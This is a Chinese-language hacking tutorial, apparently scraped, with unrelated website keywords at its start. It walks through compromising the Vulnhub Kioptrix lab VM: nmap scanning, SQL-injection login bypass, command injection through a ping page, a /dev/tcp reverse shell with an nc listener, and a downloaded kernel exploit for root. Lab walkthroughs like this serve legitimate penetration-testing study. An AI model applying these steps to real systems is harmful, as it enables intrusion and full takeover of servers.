郑州中原区建设局网站,营销网站费用,wordpress 如何制作模板下载,张家界做网站的人有许多人对神秘的黑客一直感兴趣#xff0c;却苦于网上资料繁杂#xff0c;无法入门#xff0c;在学黑客之前#xff0c;你要知道什么是黑客#xff0c;黑客就是那些对计算机有着强烈探索欲的人#xff0c;一个真正的黑客#xff0c;必须要至少掌握一门编程技术和熟悉系…有许多人对神秘的黑客一直感兴趣却苦于网上资料繁杂无法入门在学黑客之前你要知道什么是黑客黑客就是那些对计算机有着强烈探索欲的人一个真正的黑客必须要至少掌握一门编程技术和熟悉系统的操作命令。 下面我会实际演示一个黑客是如何通过一个普通的网站攻破服务器并获取ROOT权限。 基础环境准备 1、安装Vmware虚拟机(不建议使用真机) 2、前往vulnhub下载测试镜像下载地址 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 3、用Vmware安装下载镜像安装完成后启动服务器(这就是我们的目标服务器了) 4、虚拟机安装kali操作系统kali系统下载地址 https://www.kali.org/downloads/(也可以选择其它操作系统Kali关于渗透测试工具集成比较好) 以上基础环境可谷歌、百度自行安装有问题可以反馈留言。 备注目标服务器和Kali服务器网络需要配置同一个网段默认选择Vmware的桥接模式即可。 操作流程 一、Kali系统IP查看 基础环境准备完毕这时候需要打开我们的Kali服务器了查看Kali服务器自身的IP敲入ifconfig命令查看到Kali系统自身IP地址为192.168.137.133。 二、扫描目标服务器IP地址 nmap -sP 192.168.137.1/24 经过nmap扫描后发现同网段有192.168.137.88 的IP这个IP就是我们此行的目标IP了。 三、扫描目标服务器开放端口 nmap -A -p 1-65535 192.168.137.88 -v5 扫描192.168.137.88这台服务器上开放的端口发现目标服务器开放的端口比较多其中有常见的3306和80端口相信有一定经验的运维或者开发人员都知道这两个端口代表Mysql服务和Http服务后面攻击这台服务器就会通过常见的80端口进行操作 四、SQL注入操作 用浏览器访问http://192.168.137.88发现是个登录页面尝试用SQL注入可登录到管理后台此SQL注入原理是由于后台服务对用户输入的参数没有进行校验直接进行SQL拼接导致出现该漏洞。 登录后发现可看到管理员界面这个界面是管理员用于查看机器是否能ping通的测试输入localhost点击submit发现ping命令可以执行然后这时可以用 符号连接其他命令发现都能正常执行这时想到我们可以利用反弹shell进行操作。 五、反弹Shell操作 Kali机器执行如下命令 nc命令可以实现任意TCP/UDP端口的侦听这里nc是作为server以TCP或UDP方式侦听4444端口(备注也可以指定其它端口) nc -v -l -p 4444 浏览器上填写如下命令 此命令是实现反弹shellsh -i 打开一个交互的sh/dev/tcp建立一个socket连接将标准错误输出重定向到标准输出中01将标准输入重定向到标准输出中。 localhost sh -i /dev/tcp/192.168.137.133/4444 01 这时候发现自己的Kali机器上已经进入shell操作界面这时候的shell就已经是目标机器的shell了(偷偷的窃喜一波) 查看目前的用户发现是apache用户权限较低无法创建、操作、删除文件也没有权限进行sudo操作如下图所示 六、提升权限到ROOT 这时执行 uname -a 命令发现该系统用到的内核是2.6.9版本如下图所示。 这时候就可以去谷歌搜索该内核版本是否存在高危漏洞或者使用searchsploit工具进行搜索幸运的是网上已经有人针对该内核版本做过提权漏洞的脚本如下图。 通过wget把该文件下载到服务器上由于操作的终端是反弹shell的终端rz命令不可用。如果文件较内容较少可以手动编辑这里我是直接本地用 python -m SimpleHTTPServer起个简单的静态文件服务然后在服务器用wget命令下载。 下载完成后用gcc命令编译然后执行编译后的文件此时发现权限已经由普通的apache用户提权到root用户了到此大功告成了可以彻底做自己想做的事情了。